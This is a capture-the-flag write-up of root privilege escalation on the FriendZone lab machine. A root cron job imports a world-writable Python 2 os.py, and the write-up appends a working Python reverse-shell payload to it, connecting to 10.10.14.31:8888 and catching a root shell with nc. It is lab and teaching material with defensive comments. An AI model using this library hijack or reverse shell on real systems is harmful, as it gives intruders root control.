7 privesc

pspy

2021/06/07 01:44:01 CMD: UID=0    PID=19787  | /bin/sh -c /opt/server_admin/reporter.py
2021/06/07 01:44:01 CMD: UID=0    PID=19786  | /bin/sh -c /opt/server_admin/reporter.py
2021/06/07 01:44:01 CMD: UID=0    PID=19785  | /usr/sbin/CRON -f

www-data@FriendZone:/opt/server_admin$ cat reporter.py
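#!/usr/bin/python
"""Scheduled reporter stub that root's cron runs (see the pspy capture above).

The mail-sending step is commented out, so running this script only emits the
status line printed below. Because cron executes it as UID 0 with the system
Python 2 interpreter, every module it imports (including ``os``) is loaded
and executed as root; those stdlib files therefore need to stay root-owned
and not writable by other users.
"""

import os  # currently unused; kept because the disabled os.system() call below expects it

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

# Parenthesised single-argument form prints the same line under Python 2 and 3.
print("[+] Trying to send email to %s" % to_address)

# Disabled mailsend invocation. The original line carried the SMTP password in
# cleartext inside this world-readable script; it is replaced with a placeholder
# here -- the credential belongs in a root-only config file or the environment,
# and the exposed one should be rotated.
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "<SMTP_PASSWORD_PLACEHOLDER>"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer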
www-data@FriendZone:/opt/server_admin$

locate os.py
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.py
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.pyc
/usr/lib/python2.7/encodings/palmos.py
/usr/lib/python2.7/encodings/palmos.pyc
/usr/lib/python3/dist-packages/LanguageSelector/macros.py
/usr/lib/python3.6/os.py
/usr/lib/python3.6/encodings/palmos.py

ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15  2019 /usr/lib/python2.7/os.py
ls -la /usr/lib/python3.6/os.py
-rw-r--r-- 1 root root 37526 Sep 12  2018 /usr/lib/python3.6/os.py

Because /usr/lib/python2.7/os.py is world-writable (mode 0777 in the ls output above) and the root cron job's reporter.py imports it, we can modify that file and append our code; it will then execute as root the next time the job runs.

# Payload appended to the world-writable /usr/lib/python2.7/os.py (mode 0777,
# see the ls output above). Anything added to a stdlib module executes in every
# Python 2 process that imports it -- here the root cron job
# /opt/server_admin/reporter.py, so the code below runs as UID 0.
# Defensive takeaways: stdlib files must be root-owned and not group/world
# writable (0644); alert on writes under /usr/lib/python* and on cron-launched
# interpreters opening outbound TCP connections.
import socket,subprocess,os;
# TCP connection back to the listener shown below (10.10.14.31:8888).
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.31",8888));
# stdin, stdout and stderr of this process are redirected onto the socket.
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
# The interactive shell inherits those descriptors; call() blocks until it exits.
p=subprocess.call(["/bin/sh","-i"]);

Wait for the cron job to run reporter.py again (the pspy output shows it is launched as UID 0), which imports the modified os.py.

$ rlwrap nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.123] 59638
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
